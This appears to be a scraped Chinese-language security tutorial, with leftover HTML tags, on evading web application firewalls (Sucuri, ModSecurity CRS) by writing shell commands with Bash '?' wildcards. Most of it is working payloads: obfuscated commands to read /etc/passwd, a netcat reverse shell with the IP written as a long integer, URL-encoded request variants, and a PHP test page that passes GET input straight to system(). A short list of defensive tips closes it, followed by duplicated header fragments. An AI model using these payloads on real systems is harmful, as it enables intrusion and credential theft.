WAF绕过技巧：利用Bash通配符绕过命令执行防护<\/h1>

1. 背景介绍<\/h2>
远程命令执行(RCE)漏洞是Web应用中最严重的风险之一，在OWASP Top 10中长期位居前列。现代WAF(Web应用防火墙)大多具备对RCE攻击的拦截能力，但在Linux系统中，通过巧妙利用Bash通配符，我们可以绕过许多WAF的规则集。<\/p>

2. Bash通配符基础<\/h2>

Bash标准通配符(也称为通配符模式)被各种命令行程序用于处理多个文件：<\/p>

?<\/code> 匹配任意单个字符<\/li>
*<\/code> 匹配任意数量的任意字符<\/li>

[]<\/code> 匹配指定范围内的字符<\/li>
<\/ul>
2.1 通配符替代命令示例<\/h3>



常规命令<\/th>
通配符替代形式<\/th>
<\/tr>
<\/thead>


\/bin\/ls<\/code><\/td>
\/?in\/ls<\/code> 或 \/???\/?s<\/code><\/td>
<\/tr>

\/bin\/cat \/etc\/passwd<\/code><\/td>
\/???\/??t \/???\/??ss??<\/code><\/td>
<\/tr>

nc -e \/bin\/bash 127.0.0.1 1337<\/code><\/td>
\/???\/n? -e \/???\/b??h 2130706433 1337<\/code><\/td>
<\/tr>
<\/tbody>
<\/table>
3. 绕过WAF的具体技术<\/h2>
3.1 文件读取绕过<\/h3>
传统方式：<\/p>
\/?cmd=cat+\/etc\/passwd
<\/code><\/pre>
绕过方式：<\/p>
\/?cmd=%2f???%2f??t%20%2f???%2fp??s??
<\/code><\/pre>
3.2 反向Shell绕过<\/h3>
传统方式：<\/p>
\/bin\/nc -e \/bin\/bash 127.0.0.1 1337
<\/code><\/pre>
绕过技巧：<\/p>

使用通配符替代路径<\/li>
将IP地址转换为长整型格式(127.0.0.1 → 2130706433)<\/li>
<\/ol>
绕过方式：<\/p>
\/???\/n? -e \/???\/b??h 2130706433 1337
<\/code><\/pre>
3.3 为什么使用问号而非星号<\/h3>

星号(*<\/code>)常被用于注释语法(如\/* 注释 *\/<\/code>)，许多WAF会阻止它以防止SQL注入等攻击<\/li>
问号(?<\/code>)匹配更精确，不易被WAF规则识别为恶意字符<\/li>
<\/ul>
4. 针对不同WAF的绕过实践<\/h2>
4.1 Sucuri WAF绕过<\/h3>
测试用例：<\/p>
<?<\/span>php<\/span> 
<\/span><\/span>echo<\/span> 'ok: '<\/span>;
<\/span><\/span>print_r<\/span>($_GET['c'<\/span>]); 
<\/span><\/span>system<\/span>($_GET['c'<\/span>]);
<\/span><\/span><\/code><\/pre>传统攻击被拦截：<\/p>
\/?c=\/bin\/cat \/etc\/passwd
<\/code><\/pre>
成功绕过：<\/p>
\/?c=\/???\/??t \/???\/??ss??
<\/code><\/pre>
4.2 OWASP ModSecurity核心规则集绕过<\/h3>
不同防护等级(PL)的分析：<\/h4>
PL0<\/strong>:<\/p>

许多规则被禁用<\/li>
payload可直接执行<\/li>
<\/ul>
PL1 & PL2<\/strong>:<\/p>

阻止传统攻击方式(如\/bin\/cat \/etc\/passwd<\/code>)<\/li>
但允许?<\/code>、\/<\/code>和空格字符<\/li>
通配符形式可绕过<\/li>
<\/ul>
PL3<\/strong>:<\/p>

会阻止包含过多?<\/code>的请求<\/li>
解决方案：减少通配符数量<\/li>
<\/ul>
\/?c=\/?in\/cat+\/et?\/passw?
<\/code><\/pre>
PL4<\/strong>:<\/p>

最严格等级<\/li>
仅允许A-Z, a-z, 0-9及少数特殊字符<\/li>
极难绕过，因为命令执行通常需要空格或斜线<\/li>
<\/ul>
5. 其他实用技巧<\/h2>
5.1 枚举文件和目录<\/h3>
echo \/*\/*ss*
<\/code><\/pre>
5.2 避免使用点字符<\/h3>

将IP地址转换为长整型格式<\/li>
127.0.0.1 → 2130706433<\/li>
<\/ul>
5.3 不同命令的替代形式<\/h3>
\/???\/?c.e \/???\/b??h 2130706433 1337
<\/code><\/pre>
6. 防御建议<\/h2>

使用最高防护等级(PL4)的ModSecurity规则<\/li>
限制系统命令执行函数的使用<\/li>
对用户输入进行严格的白名单验证<\/li>
监控异常的命令执行模式<\/li>
定期更新WAF规则集<\/li>
<\/ol>
7. 总结<\/h2>
通过Bash通配符技术，特别是问号(?<\/code>)的使用，可以有效地绕过许多WAF对命令执行的防护。这种技术利用了WAF规则集中对特殊字符处理的不足，特别是在中低防护等级下效果显著。安全团队应当了解这些绕过技术，以便更好地加固Web应用防护。<\/p>
8. 扩展阅读<\/h2>

Web Application Firewall (WAF) Evasion Techniques #2<\/a><\/li>
ModSecurity v3 Github<\/a><\/li>
netnea关于Apache ModSecurity的文章<\/a><\/li>
<\/ol>

WAF绕过技巧：利用Bash通配符绕过命令执行防护<\/h1>

3. 绕过WAF的具体技术<\/h2>

4. 针对不同WAF的绕过实践<\/h2>

4.2 OWASP ModSecurity核心规则集绕过<\/h3>

5. 其他实用技巧<\/h2>

8. 扩展阅读<\/h2> Web Application Firewall (WAF) Evasion Techniques #2<\/a><\/li> ModSecurity v3 Github<\/a><\/li> netnea关于Apache ModSecurity的文章<\/a><\/li> <\/ol>

`8. 扩展阅读<\/h2> Web Application Firewall (WAF) Evasion Techniques #2<\/a><\/li> ModSecurity v3 Github<\/a><\/li> netnea关于Apache ModSecurity的文章<\/a><\/li> <\/ol>`